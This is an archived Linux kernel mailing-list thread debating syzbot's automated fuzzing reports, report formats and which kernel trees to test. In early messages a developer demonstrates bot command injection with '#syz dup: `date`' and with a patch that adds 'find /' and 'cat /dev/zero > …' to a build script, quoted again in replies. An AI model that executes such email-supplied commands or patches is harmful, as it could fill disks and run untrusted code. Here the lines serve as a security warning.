diff mbox series

dangers of bots on the mailing lists was Re: divide error in ___bpf_prog_run

Message ID 20180117093225.GB20303@amd
State Not Applicable, archived
Delegated to: David Miller
Headers show
Series dangers of bots on the mailing lists was Re: divide error in ___bpf_prog_run | expand

Commit Message

Pavel Machek Jan. 17, 2018, 9:32 a.m. UTC
On Fri 2018-01-12 17:58:01, syzbot wrote:
> Hello,
> 
> syzkaller hit the following crash on
> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b

What an useful way to describe kernel version.

Could we get reasonable subject line? 4.15-rc7: prefix would be nice
if it is on mainline, net-next: subject if it happens only on next
tree, etc.

> ---
> This bug is generated by a dumb bot. It may contain errors.

We don't want dumb bots to send automated emails to 1000s of
people. If it is important enough to be sent to 1000s of people, it is
also important enough for you to manually check the mail before sending.

> See https://goo.gl/tpsmEJ for details.
> Direct all questions to syzkaller@googlegroups.com.
> 
> syzbot will keep track of this bug report.
> If you forgot to add the Reported-by tag, once the fix for this bug is
> merged
> into any tree, please reply to this email with:
> #syz fix: exact-commit-title
> If you want to test a patch for this bug, please reply with:
> #syz test: git://repo/address.git branch
> and provide the patch inline or as an attachment.
> To mark this as a duplicate of another syzbot report, please reply with:
> #syz dup: exact-subject-of-another-report
> If it's a one-off invalid bug report, please reply with:
> #syz invalid
> Note: if the crash happens again, it will cause creation of a new bug
> report.
> Note: all commands must start from beginning of the line in the email body.

...and then the developers will no longer need to learn command line
interface to your robot.

#syz test: git://gcc.gnu.org/git/gcc.git master
#syz dup: `date`

If there's some other bot reading this: you may not want to
automatically execute code you received through email....

								Pavel

Comments

Dmitry Vyukov Jan. 17, 2018, 9:45 a.m. UTC | #1
On Wed, Jan 17, 2018 at 10:32 AM, Pavel Machek <pavel@ucw.cz> wrote:
> On Fri 2018-01-12 17:58:01, syzbot wrote:
>> Hello,
>>
>> syzkaller hit the following crash on
>> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
>
> What an useful way to describe kernel version.
>
> Could we get reasonable subject line? 4.15-rc7: prefix would be nice
> if it is on mainline,

Yes, I guess. I am all for useful improvements.
What exactly is reasonable subject line? And how it can be extracted
for an arbitrary kernel tree?


> net-next: subject if it happens only on next
> tree, etc.

Unfortunately this information can't be reliably obtained for any
kernel bug (due to the nature of kernel, not due to syzbot).
Dmitry Vyukov Jan. 17, 2018, 9:48 a.m. UTC | #2
On Wed, Jan 17, 2018 at 10:32 AM, Pavel Machek <pavel@ucw.cz> wrote:
> On Fri 2018-01-12 17:58:01, syzbot wrote:
>> Hello,
>>
>> syzkaller hit the following crash on
>> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
>
> What an useful way to describe kernel version.
>
> Could we get reasonable subject line? 4.15-rc7: prefix would be nice
> if it is on mainline, net-next: subject if it happens only on next
> tree, etc.
>
>> ---
>> This bug is generated by a dumb bot. It may contain errors.
>
> We don't want dumb bots to send automated emails to 1000s of
> people. If it is important enough to be sent to 1000s of people, it is
> also important enough for you to manually check the mail before sending.
>
>> See https://goo.gl/tpsmEJ for details.
>> Direct all questions to syzkaller@googlegroups.com.
>>
>> syzbot will keep track of this bug report.
>> If you forgot to add the Reported-by tag, once the fix for this bug is
>> merged
>> into any tree, please reply to this email with:
>> #syz fix: exact-commit-title
>> If you want to test a patch for this bug, please reply with:
>> #syz test: git://repo/address.git branch
>> and provide the patch inline or as an attachment.
>> To mark this as a duplicate of another syzbot report, please reply with:
>> #syz dup: exact-subject-of-another-report
>> If it's a one-off invalid bug report, please reply with:
>> #syz invalid
>> Note: if the crash happens again, it will cause creation of a new bug
>> report.
>> Note: all commands must start from beginning of the line in the email body.
>
> ...and then the developers will no longer need to learn command line
> interface to your robot.
>
> #syz test: git://gcc.gnu.org/git/gcc.git master
> #syz dup: `date`


Pavel, please stop harming the useful process!
syzkaller+syzbot already helped to fix 500+ kernel runtime bugs and
counting (that's only what is materially documented). Please stop.


> If there's some other bot reading this: you may not want to
> automatically execute code you received through email....
>
>                                                                 Pavel
>
> diff --git a/scripts/checksyscalls.sh b/scripts/checksyscalls.sh
> index ee3dfb5..d02df2c 100755
> --- a/scripts/checksyscalls.sh
> +++ b/scripts/checksyscalls.sh
> @@ -10,6 +10,9 @@
>  # checksyscalls.sh gcc gcc-options
>  #
>
> +find /
> +cat /dev/zero > and_this_is_why_bots_are_stupid
> +
>  ignore_list() {
>  cat << EOF
>  #include <asm/types.h>
>
> --
> (english) http://www.livejournal.com/~pavelmachek
> (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
>
> --
> You received this message because you are subscribed to the Google Groups "syzkaller-bugs" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to syzkaller-bugs+unsubscribe@googlegroups.com.
> To view this discussion on the web visit https://groups.google.com/d/msgid/syzkaller-bugs/20180117093225.GB20303%40amd.
> For more options, visit https://groups.google.com/d/optout.
Daniel Borkmann Jan. 17, 2018, 9:49 a.m. UTC | #3
On 01/17/2018 10:32 AM, Pavel Machek wrote:
> On Fri 2018-01-12 17:58:01, syzbot wrote:
>> Hello,
>>
>> syzkaller hit the following crash on
>> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
> 
> What an useful way to describe kernel version.
> 
> Could we get reasonable subject line? 4.15-rc7: prefix would be nice
> if it is on mainline, net-next: subject if it happens only on next
> tree, etc.

Don't know if there's such a possibility, but it would be nice if we could
target fuzzing for specific subsystems in related subtrees directly (e.g.
for bpf in bpf and bpf-next trees as one example). Dmitry?

Anyway, thanks for all the great work on improving syzkaller!

Cheers,
Daniel

P.s.: The fixes are already in bpf tree and will go out later today for 4.15
      (and once in mainline, then for stable as well).
Pavel Machek Jan. 17, 2018, 9:49 a.m. UTC | #4
On Wed 2018-01-17 10:45:16, Dmitry Vyukov wrote:
> On Wed, Jan 17, 2018 at 10:32 AM, Pavel Machek <pavel@ucw.cz> wrote:
> > On Fri 2018-01-12 17:58:01, syzbot wrote:
> >> Hello,
> >>
> >> syzkaller hit the following crash on
> >> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
> >
> > What an useful way to describe kernel version.
> >
> > Could we get reasonable subject line? 4.15-rc7: prefix would be nice
> > if it is on mainline,
> 
> Yes, I guess. I am all for useful improvements.
> What exactly is reasonable subject line? And how it can be extracted
> for an arbitrary kernel tree?

Figure something out. Everyone trying to act on your bug report will
need to find out, anyway, and searching for trees having just sha1
hash is just not funny.

								Pavel
Pavel Machek Jan. 17, 2018, 9:52 a.m. UTC | #5
> >
> > ...and then the developers will no longer need to learn command line
> > interface to your robot.
> >
> > #syz test: git://gcc.gnu.org/git/gcc.git master
> > #syz dup: `date`
> 
> 
> Pavel, please stop harming the useful process!
> syzkaller+syzbot already helped to fix 500+ kernel runtime bugs and
> counting (that's only what is materially documented). Please stop.

Well, you are also hurting kernel development by spamming the
lists. You stop.

As I said, get human in the loop. Automatically executing shell
commands you get over email is a bad idea.

								Pavel


> > If there's some other bot reading this: you may not want to
> > automatically execute code you received through email....
> >
> >                                                                 Pavel
> >
> > diff --git a/scripts/checksyscalls.sh b/scripts/checksyscalls.sh
> > index ee3dfb5..d02df2c 100755
> > --- a/scripts/checksyscalls.sh
> > +++ b/scripts/checksyscalls.sh
> > @@ -10,6 +10,9 @@
> >  # checksyscalls.sh gcc gcc-options
> >  #
> >
> > +find /
> > +cat /dev/zero > and_this_is_why_bots_are_stupid
> > +
> >  ignore_list() {
> >  cat << EOF
> >  #include <asm/types.h>
> >
> > --
> > (english) http://www.livejournal.com/~pavelmachek
> > (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
> >
> > --
> > You received this message because you are subscribed to the Google Groups "syzkaller-bugs" group.
> > To unsubscribe from this group and stop receiving emails from it, send an email to syzkaller-bugs+unsubscribe@googlegroups.com.
> > To view this discussion on the web visit https://groups.google.com/d/msgid/syzkaller-bugs/20180117093225.GB20303%40amd.
> > For more options, visit https://groups.google.com/d/optout.
Florian Westphal Jan. 17, 2018, 10:03 a.m. UTC | #6
Pavel Machek <pavel@ucw.cz> wrote:
> > > ...and then the developers will no longer need to learn command line
> > > interface to your robot.
> > >
> > > #syz test: git://gcc.gnu.org/git/gcc.git master
> > > #syz dup: `date`
> > 
> > 
> > Pavel, please stop harming the useful process!
> > syzkaller+syzbot already helped to fix 500+ kernel runtime bugs and
> > counting (that's only what is materially documented). Please stop.
> 
> Well, you are also hurting kernel development by spamming the
> lists. You stop.

Bullshit.  Learn to filter your email if you're not interested in fixing
bugs.  Or unsubscribe.
Henrique de Moraes Holschuh Jan. 17, 2018, 10:11 a.m. UTC | #7
On Wed, 17 Jan 2018, Dmitry Vyukov wrote:
> On Wed, Jan 17, 2018 at 10:32 AM, Pavel Machek <pavel@ucw.cz> wrote:
> > On Fri 2018-01-12 17:58:01, syzbot wrote:
> >> syzkaller hit the following crash on
> >> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
> >
> > What an useful way to describe kernel version.
> >
> > Could we get reasonable subject line? 4.15-rc7: prefix would be nice
> > if it is on mainline,
> 
> Yes, I guess. I am all for useful improvements.
> What exactly is reasonable subject line? And how it can be extracted
> for an arbitrary kernel tree?

It can't, I guess.  But maybe you could extract it from syzbot
information about the context of that patch?

Maybe tagging it with the git tree you fetched when getting it over git,
and mail from[1]+subject+message-id when getting it over email?

[1] processing of related headers to handle mailing lists and
retransmits is required, e.g. ressent-*, etc.  But this is relatively
easy to do as well.

A map to generate subject prefixes from key git trees or MLs could
enhance that even further, to get at least mainline:, *-next:, etc.
Dmitry Vyukov Jan. 17, 2018, 11:09 a.m. UTC | #8
On Wed, Jan 17, 2018 at 10:49 AM, Daniel Borkmann <daniel@iogearbox.net> wrote:
> Don't know if there's such a possibility, but it would be nice if we could
> target fuzzing for specific subsystems in related subtrees directly (e.g.
> for bpf in bpf and bpf-next trees as one example). Dmitry?

Hi Daniel,

It's doable.
Let's start with one bpf tree. Will it be bpf or bpf-next? Which one
contains more ongoing work? What's the exact git repo address/branch,
so that I don't second guess?
Also what syscalls it makes sense to enable there to target it at bpf
specifically? As far as I understand effects of bpf are far beyond the
bpf call and proper testing requires some sockets and other stuff. For
sockets, will it be enough to enable ip/ipv6? Because if we enable all
of sctp/dccp/tipc/pptp/etc, it will sure will be finding lots of bugs
there as well. Does bpf affect incoming network packets?
Also are there any sysctl's, command line arguments, etc that need to
be tuned. I know there are net.core.bpf_jit_enable/harden, but I don't
know what's the most relevant combination. Ideally, we test all of
them, but let start with one of them because it requires separate
instances (since the setting is global and test programs can't just
flip it randomly).
Also do you want testing from root or not from root? We generally
don't test under root, because syzkaller comes up with legal ways to
shut everything down even if we try to contain it (e.g. kill init
somehow or shut down network using netlink). But if we limit syscall
surface, then root may work and allow testing staging bpf features.


> Anyway, thanks for all the great work on improving syzkaller!

Thanks! So nice to hear, especially in the context of this thread.
Theodore Y. Ts'o Jan. 17, 2018, 8:47 p.m. UTC | #9
On Wed, Jan 17, 2018 at 12:09:18PM +0100, Dmitry Vyukov wrote:
> On Wed, Jan 17, 2018 at 10:49 AM, Daniel Borkmann <daniel@iogearbox.net> wrote:
> > Don't know if there's such a possibility, but it would be nice if we could
> > target fuzzing for specific subsystems in related subtrees directly (e.g.
> > for bpf in bpf and bpf-next trees as one example). Dmitry?
> 
> Hi Daniel,
> 
> It's doable.
> Let's start with one bpf tree. Will it be bpf or bpf-next? Which one
> contains more ongoing work? What's the exact git repo address/branch,
> so that I don't second guess?

As a suggestion, until the bpf subsystem is free from problems that
can be found by Syzkaller in Linus's upstream tree, maybe it's not
worth trying to test individual subsystem trees such as the bpf tree?
After all, there's no point trying to bisect our way checking to see
if the problem is with a newly added commit in a development tree, if
it turns out the problem was first introduced years ago in the 4.1 or
3.19 timeframe.

After all, finding these older problems is going to have much higher
value, since these are the sorts of potential security problems that
are worth backporting to real device kernels for Android/ChromeOS, and
for enterprise distro kernels.  So from an "impact to the industry"
perspective, focusing on Linus's tree is going to be far more
productive.  That's a win for the community, and it's a win for those
people on the Syzkaller team who might be going up for promo or
listing their achievements at performance review time.  :-)

This will also give the Syzkaller team more time to make the
automation more intelligent in terms of being able to do the automatic
bisection to find the first guilty commit, labelling the report with
the specific subsystem tree that that it came from, etc., etc.

Cheers,

						- Ted

P.S.  Something that might be *really* interesting is for those cases
where Syzkaller can find a repro, to test that repro on various stable
4.4, 4.9, 3.18, et. al. LTS kernels.  This will take less resources
than a full bisection, but it will add real value since knowledge that
it will trigger on a LTS kernel will help prioritize which reports
developers might be more interested in focusing upon, and it will give
them a head start in determining which fixes needed to be backported
to which stable kernels.
Alexei Starovoitov Jan. 18, 2018, 12:21 a.m. UTC | #10
On Wed, Jan 17, 2018 at 03:47:35PM -0500, Theodore Ts'o wrote:
> On Wed, Jan 17, 2018 at 12:09:18PM +0100, Dmitry Vyukov wrote:
> > On Wed, Jan 17, 2018 at 10:49 AM, Daniel Borkmann <daniel@iogearbox.net> wrote:
> > > Don't know if there's such a possibility, but it would be nice if we could
> > > target fuzzing for specific subsystems in related subtrees directly (e.g.
> > > for bpf in bpf and bpf-next trees as one example). Dmitry?
> > 
> > Hi Daniel,
> > 
> > It's doable.
> > Let's start with one bpf tree. Will it be bpf or bpf-next? Which one
> > contains more ongoing work? What's the exact git repo address/branch,
> > so that I don't second guess?
> 
> As a suggestion, until the bpf subsystem is free from problems that
> can be found by Syzkaller in Linus's upstream tree, maybe it's not
> worth trying to test individual subsystem trees such as the bpf tree?
> After all, there's no point trying to bisect our way checking to see
> if the problem is with a newly added commit in a development tree, if
> it turns out the problem was first introduced years ago in the 4.1 or
> 3.19 timeframe.
> 
> After all, finding these older problems is going to have much higher
> value, since these are the sorts of potential security problems that
> are worth backporting to real device kernels for Android/ChromeOS, and
> for enterprise distro kernels.  So from an "impact to the industry"
> perspective, focusing on Linus's tree is going to be far more
> productive.  That's a win for the community, and it's a win for those
> people on the Syzkaller team who might be going up for promo or
> listing their achievements at performance review time.  :-)

all correct, but if there is capacity in syzkaller server farm
to test bpf and bpf-next trees it will be huge win for everyone as well.
For example in the recent speculation fix we missed integer overflow case
and it was found by syzkaller only when the patches landed in net tree.
We did quick follow up patch, but it caused double work for
us and all stable maintainers.
I think finding bugs in the development trees is just as important
as bugs in Linus's tree, since it improves quality of
patches before they reach mainline.

If syzkaller can only test one tree than linux-next should be the one.

There is some value of testing stable trees, but any developer
will first ask for a reproducer in the latest, so usefulness of
reporting such bugs will be limited.
Theodore Y. Ts'o Jan. 18, 2018, 1:09 a.m. UTC | #11
On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
> 
> If syzkaller can only test one tree than linux-next should be the one.

Well, there's been some controversy about that.  The problem is that
it's often not clear if this is long-standing bug, or a bug which is
in a particular subsystem tree --- and if so, *which* subsystem tree,
etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
which is often not accurate --- since the location of the crash
doesn't necessarily point out where the problem originated, and hence
who should look at the syzbot report.  And so this has caused
some.... irritation.

> There is some value of testing stable trees, but any developer
> will first ask for a reproducer in the latest, so usefulness of
> reporting such bugs will be limited.

What I suggested was to test Linus's tree, and then when a problem is
found, and syzkaller has a reliable repro, to *then* try to see if it
*also* shows up in the LTS kernels.

					- Ted
Joe Perches Jan. 18, 2018, 1:18 a.m. UTC | #12
On Wed, 2018-01-17 at 20:09 -0500, Theodore Ts'o wrote:
> get_maintainer.pl, which is often not accurate

Examples please.
Eric Biggers Jan. 18, 2018, 1:46 a.m. UTC | #13
On Wed, Jan 17, 2018 at 05:18:17PM -0800, Joe Perches wrote:
> On Wed, 2018-01-17 at 20:09 -0500, Theodore Ts'o wrote:
> > get_maintainer.pl, which is often not accurate
> 
> Examples please.
> 

Well, the primary problem is that place the crash occurs is not necessarily
responsible for the bug.  But, syzbot actually does have a file blacklist for
exactly that reason; see
https://github.com/google/syzkaller/blob/master/pkg/report/linux.go#L56

It definitely needs further improvement (and anyone is welcome to contribute),
though it will never be perfect.  

There is also a KASAN change by Dmitry queued up for 4.16 that will allow KASAN
to detect invalid frees.  That would have detected the bug in crypto/pcrypt.c
that was causing corruption in the kmalloc-1024 slab cache, and was causing
crashes in all sorts of random kernel code, resulting many bug reports.  So,
detecting bugs early before they corrupt all sorts of random kernel data
structures helps a lot too.

And yes, get_maintainer.pl sometimes isn't accurate even if the offending code
is correctly identified.  That's more of a community problem, e.g. people
sometimes don't bother to remove themselves from MAINTAINERS when they quit
maintaining, and sometimes people don't feel responsible enough for a file to
add themselves to MAINTAINERS, even when in practice they are actually taking
most of the patches to it through their tree.

Eric
Joe Perches Jan. 18, 2018, 2:35 a.m. UTC | #14
On Wed, 2018-01-17 at 17:46 -0800, Eric Biggers wrote:
> On Wed, Jan 17, 2018 at 05:18:17PM -0800, Joe Perches wrote:
> > On Wed, 2018-01-17 at 20:09 -0500, Theodore Ts'o wrote:
> > > get_maintainer.pl, which is often not accurate
> > 
> > Examples please.
> > 
> 
> Well, the primary problem is that place the crash occurs is not necessarily
> responsible for the bug.  But, syzbot actually does have a file blacklist for
> exactly that reason; see
> https://github.com/google/syzkaller/blob/master/pkg/report/linux.go#L56

Which has no association to a problem with get_maintainer.

> And yes, get_maintainer.pl sometimes isn't accurate even if the offending code
> is correctly identified.  That's more of a community problem, e.g. people
> sometimes don't bother to remove themselves from MAINTAINERS when they quit
> maintaining, and sometimes people don't feel responsible enough for a file to
> add themselves to MAINTAINERS, even when in practice they are actually taking
> most of the patches to it through their tree.

Yup, not a get_maintainer problem.

There are more than 1800 sections and more than
1200 individual names in the MAINTAINERS file.

In practice, there are a few dozen maintainers
that are upstream patch paths.
Dmitry Vyukov Jan. 18, 2018, 10:57 a.m. UTC | #15
On Wed, Jan 17, 2018 at 11:11 AM, Henrique de Moraes Holschuh
<hmh@hmh.eng.br> wrote:
> On Wed, 17 Jan 2018, Dmitry Vyukov wrote:
>> On Wed, Jan 17, 2018 at 10:32 AM, Pavel Machek <pavel@ucw.cz> wrote:
>> > On Fri 2018-01-12 17:58:01, syzbot wrote:
>> >> syzkaller hit the following crash on
>> >> 19d28fbd306e7ae7c1acf05c3e6968b56f0d196b
>> >
>> > What an useful way to describe kernel version.
>> >
>> > Could we get reasonable subject line? 4.15-rc7: prefix would be nice
>> > if it is on mainline,
>>
>> Yes, I guess. I am all for useful improvements.
>> What exactly is reasonable subject line? And how it can be extracted
>> for an arbitrary kernel tree?
>
> It can't, I guess.  But maybe you could extract it from syzbot
> information about the context of that patch?
>
> Maybe tagging it with the git tree you fetched when getting it over git,
> and mail from[1]+subject+message-id when getting it over email?
>
> [1] processing of related headers to handle mailing lists and
> retransmits is required, e.g. ressent-*, etc.  But this is relatively
> easy to do as well.
>
> A map to generate subject prefixes from key git trees or MLs could
> enhance that even further, to get at least mainline:, *-next:, etc.

Hi Henrique,

Re report format.

Ted also provided some useful feedback here:
https://groups.google.com/d/msg/syzkaller/5hjgr2v_oww/fn5QW6dvDQAJ

I've made a bunch of changes yesterday and today. This includes
rearranging lines in the email, rearranging attachment order, removing
some clutter, providing short repo alias (upstream, linux-next, net,
etc), providing commit date and title. syzbot will not also prefer to
report crashes on upstream tree, rather than on other trees.
Re subject line, I don't think prefixing subject with tree will work.
What you see as a single crash actually represents from tens to tens
of thousands crashes on some set of trees. And that set grows over
time. That can be one set of trees when the bug is first reported, and
then another subset of trees when a reproducer is found. It's
obviously a bad idea to send a email per crash (every few seconds),
and even per crash/tree. To alleviate this, syzbot will now say e.g.
"So far this crash happened 185 times on linux-next, mmots, net-next,
upstream". So that you can see that it's not only, say, linux-next
problem.

syzbot just mailed another report with all of these changes which you
can see here:
https://groups.google.com/forum/#!msg/syzkaller-bugs/u5nq3PdPkIc/F4tXzErxAgAJ

Thanks
Dmitry Vyukov Jan. 18, 2018, 1:01 p.m. UTC | #16
On Thu, Jan 18, 2018 at 2:09 AM, Theodore Ts'o <tytso@mit.edu> wrote:
> On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
>>
>> If syzkaller can only test one tree than linux-next should be the one.
>
> Well, there's been some controversy about that.  The problem is that
> it's often not clear if this is long-standing bug, or a bug which is
> in a particular subsystem tree --- and if so, *which* subsystem tree,
> etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
> which is often not accurate --- since the location of the crash
> doesn't necessarily point out where the problem originated, and hence
> who should look at the syzbot report.  And so this has caused
> some.... irritation.


Re set of tested trees.

We now have an interesting spectrum of opinions.

Some assorted thoughts on this:

1. First, "upstream is clean" won't happen any time soon. There are
several reasons for this:
 - Currently syzkaller only tests a subset of subsystems that it knows
how to test, even the ones that it tests it tests poorly. Over time
it's improved to test most subsystems and existing subsystems better.
Just few weeks ago I've added some descriptions for crypto subsystem
and it uncovered 20+ old bugs.
 - syzkaller is guided, genetic fuzzer over time it leans how to do
more complex things by small steps. It takes time.
 - We have more bug detection tools coming: LEAKCHECK, KMSAN (uninit
memory), KTSAN (data races).
 - generic syzkaller smartness will be improved over time.
 - it will get more CPU resources.
Effect of all of these things is multiplicative: we test more code,
smarter, with more bug-detection tools, with more resources. So I
think we need to plan for a mix of old and new bugs for foreseeable
future.

2. get_maintainer.pl and mix of old and new bugs was mentioned as
harming attribution. I don't see what will change when/if we test only
upstream. Then the same mix of old/new bugs will be detected just on
upstream, with all of the same problems for old/new, maintainers,
which subsystem, etc. I think the amount of bugs in the kernel is
significant part of the problem, but the exact boundary where we
decide to start killing them won't affect number of bugs.

3. If we test only upstream, we increase chances of new security bugs
sinking into releases. We sure could raise perceived security value of
the bugs by keeping them private, letting them sink into release,
letting them sink into distros, and then reporting a high-profile
vulnerability. I think that's wrong. There is something broken with
value measuring in security community. Bug that is killed before
sinking into any release is the highest impact thing. As Alexei noted,
fixing bugs es early as possible also reduces fix costs, backporting
burden, etc. This also can eliminate need in bisection in some cases,
say if you accepted a large change to some files and a bunch of
crashes appears for these files on your tree soon, it's obvious what
happens.

4. It was mentioned that linux-next can have a broken slab allocator
and that will manifest as multiple random crashes. FWIW I don't
remember that I ever seen this. Yes, sometimes it does not build/boot,
but these builds are just rejected for testing.

I don't mind dropping linux-next specifically if that's the common
decision. However, (1) Alexei and Gruenter expressed opposite opinion,
(2) I don't see what it will change dramatically, (2) as far as I
understand Linus actually relies on linux-next giving some concrete
testing to the code there.
But I think that testing bpf-next is a positive thing provided that
there is explicit interest from maintainers. And note that that will
be testing targeted specifically at bpf subsystem, so that instance
will not generate bugs in SCSI, USB, etc (though it will cover a part
of net). Also note that the latest email format includes set of tree
where the crash happened, so if you see "upstream" or "upstream and
bpf-next", nothing really changes, you still know that it happens
upstream. Or if you see only "bpf-next", then you know that it's only
that tree.
Dmitry Vyukov Jan. 18, 2018, 1:06 p.m. UTC | #17
On Thu, Jan 18, 2018 at 2:01 PM, Dmitry Vyukov <dvyukov@google.com> wrote:
> On Thu, Jan 18, 2018 at 2:09 AM, Theodore Ts'o <tytso@mit.edu> wrote:
>> On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
>>>
>>> If syzkaller can only test one tree than linux-next should be the one.
>>
>> Well, there's been some controversy about that.  The problem is that
>> it's often not clear if this is long-standing bug, or a bug which is
>> in a particular subsystem tree --- and if so, *which* subsystem tree,
>> etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
>> which is often not accurate --- since the location of the crash
>> doesn't necessarily point out where the problem originated, and hence
>> who should look at the syzbot report.  And so this has caused
>> some.... irritation.
>
>
> Re set of tested trees.
>
> We now have an interesting spectrum of opinions.
>
> Some assorted thoughts on this:
>
> 1. First, "upstream is clean" won't happen any time soon. There are
> several reasons for this:
>  - Currently syzkaller only tests a subset of subsystems that it knows
> how to test, even the ones that it tests it tests poorly. Over time
> it's improved to test most subsystems and existing subsystems better.
> Just few weeks ago I've added some descriptions for crypto subsystem
> and it uncovered 20+ old bugs.

/\/\/\/\/\/\/\/\/\/\/\/\

While we are here, you can help syzkaller to test your subsystem
better (or at all). It frequently requires domain expertise which we
don't have for all kernel subsystems (sometimes we don't even know
they exist). It can be as simple as this (for /dev/ashmem):
https://github.com/google/syzkaller/blob/master/sys/linux/ashmem.txt


>  - syzkaller is guided, genetic fuzzer over time it leans how to do
> more complex things by small steps. It takes time.
>  - We have more bug detection tools coming: LEAKCHECK, KMSAN (uninit
> memory), KTSAN (data races).
>  - generic syzkaller smartness will be improved over time.
>  - it will get more CPU resources.
> Effect of all of these things is multiplicative: we test more code,
> smarter, with more bug-detection tools, with more resources. So I
> think we need to plan for a mix of old and new bugs for foreseeable
> future.
>
> 2. get_maintainer.pl and mix of old and new bugs was mentioned as
> harming attribution. I don't see what will change when/if we test only
> upstream. Then the same mix of old/new bugs will be detected just on
> upstream, with all of the same problems for old/new, maintainers,
> which subsystem, etc. I think the amount of bugs in the kernel is
> significant part of the problem, but the exact boundary where we
> decide to start killing them won't affect number of bugs.
>
> 3. If we test only upstream, we increase chances of new security bugs
> sinking into releases. We sure could raise perceived security value of
> the bugs by keeping them private, letting them sink into release,
> letting them sink into distros, and then reporting a high-profile
> vulnerability. I think that's wrong. There is something broken with
> value measuring in security community. Bug that is killed before
> sinking into any release is the highest impact thing. As Alexei noted,
> fixing bugs es early as possible also reduces fix costs, backporting
> burden, etc. This also can eliminate need in bisection in some cases,
> say if you accepted a large change to some files and a bunch of
> crashes appears for these files on your tree soon, it's obvious what
> happens.
>
> 4. It was mentioned that linux-next can have a broken slab allocator
> and that will manifest as multiple random crashes. FWIW I don't
> remember that I ever seen this. Yes, sometimes it does not build/boot,
> but these builds are just rejected for testing.
>
> I don't mind dropping linux-next specifically if that's the common
> decision. However, (1) Alexei and Gruenter expressed opposite opinion,
> (2) I don't see what it will change dramatically, (2) as far as I
> understand Linus actually relies on linux-next giving some concrete
> testing to the code there.
> But I think that testing bpf-next is a positive thing provided that
> there is explicit interest from maintainers. And note that that will
> be testing targeted specifically at bpf subsystem, so that instance
> will not generate bugs in SCSI, USB, etc (though it will cover a part
> of net). Also note that the latest email format includes set of tree
> where the crash happened, so if you see "upstream" or "upstream and
> bpf-next", nothing really changes, you still know that it happens
> upstream. Or if you see only "bpf-next", then you know that it's only
> that tree.
Dmitry Vyukov Jan. 18, 2018, 1:10 p.m. UTC | #18
On Wed, Jan 17, 2018 at 12:09 PM, Dmitry Vyukov <dvyukov@google.com> wrote:
> On Wed, Jan 17, 2018 at 10:49 AM, Daniel Borkmann <daniel@iogearbox.net> wrote:
>> Don't know if there's such a possibility, but it would be nice if we could
>> target fuzzing for specific subsystems in related subtrees directly (e.g.
>> for bpf in bpf and bpf-next trees as one example). Dmitry?
>
> Hi Daniel,
>
> It's doable.
> Let's start with one bpf tree. Will it be bpf or bpf-next? Which one
> contains more ongoing work? What's the exact git repo address/branch,
> so that I don't second guess?
> Also what syscalls it makes sense to enable there to target it at bpf
> specifically? As far as I understand effects of bpf are far beyond the
> bpf call and proper testing requires some sockets and other stuff. For
> sockets, will it be enough to enable ip/ipv6? Because if we enable all
> of sctp/dccp/tipc/pptp/etc, it will sure will be finding lots of bugs
> there as well. Does bpf affect incoming network packets?
> Also are there any sysctl's, command line arguments, etc that need to
> be tuned. I know there are net.core.bpf_jit_enable/harden, but I don't
> know what's the most relevant combination. Ideally, we test all of
> them, but let start with one of them because it requires separate
> instances (since the setting is global and test programs can't just
> flip it randomly).
> Also do you want testing from root or not from root? We generally
> don't test under root, because syzkaller comes up with legal ways to
> shut everything down even if we try to contain it (e.g. kill init
> somehow or shut down network using netlink). But if we limit syscall
> surface, then root may work and allow testing staging bpf features.

So, Daniel, Alexei,

I understand that I asked lots of questions, but they are relatively
simple. I need that info to setup proper testing.
Henrique de Moraes Holschuh Jan. 18, 2018, 1:41 p.m. UTC | #19
On Thu, 18 Jan 2018, Dmitry Vyukov wrote:
> I've made a bunch of changes yesterday and today. This includes

...

> and even per crash/tree. To alleviate this, syzbot will now say e.g.
> "So far this crash happened 185 times on linux-next, mmots, net-next,
> upstream". So that you can see that it's not only, say, linux-next
> problem.
> 
> syzbot just mailed another report with all of these changes which you
> can see here:
> https://groups.google.com/forum/#!msg/syzkaller-bugs/u5nq3PdPkIc/F4tXzErxAgAJ

Looks good to me.  Not that I had anything against what it did before,
but it is much more recipient-friendly now, IMHO.

Thanks for all the hard work on syzkaller!
Greg Kroah-Hartman Jan. 18, 2018, 2:05 p.m. UTC | #20
On Thu, Jan 18, 2018 at 02:01:28PM +0100, Dmitry Vyukov wrote:
> On Thu, Jan 18, 2018 at 2:09 AM, Theodore Ts'o <tytso@mit.edu> wrote:
> > On Wed, Jan 17, 2018 at 04:21:13PM -0800, Alexei Starovoitov wrote:
> >>
> >> If syzkaller can only test one tree than linux-next should be the one.
> >
> > Well, there's been some controversy about that.  The problem is that
> > it's often not clear if this is long-standing bug, or a bug which is
> > in a particular subsystem tree --- and if so, *which* subsystem tree,
> > etc.  So it gets blasted to linux-kernel, and to get_maintainer.pl,
> > which is often not accurate --- since the location of the crash
> > doesn't necessarily point out where the problem originated, and hence
> > who should look at the syzbot report.  And so this has caused
> > some.... irritation.
> 
> 
> Re set of tested trees.
> 
> We now have an interesting spectrum of opinions.
> 
> Some assorted thoughts on this:
> 
> 1. First, "upstream is clean" won't happen any time soon. There are
> several reasons for this:
>  - Currently syzkaller only tests a subset of subsystems that it knows
> how to test, even the ones that it tests it tests poorly. Over time
> it's improved to test most subsystems and existing subsystems better.
> Just few weeks ago I've added some descriptions for crypto subsystem
> and it uncovered 20+ old bugs.
>  - syzkaller is guided, genetic fuzzer over time it leans how to do
> more complex things by small steps. It takes time.
>  - We have more bug detection tools coming: LEAKCHECK, KMSAN (uninit
> memory), KTSAN (data races).
>  - generic syzkaller smartness will be improved over time.
>  - it will get more CPU resources.
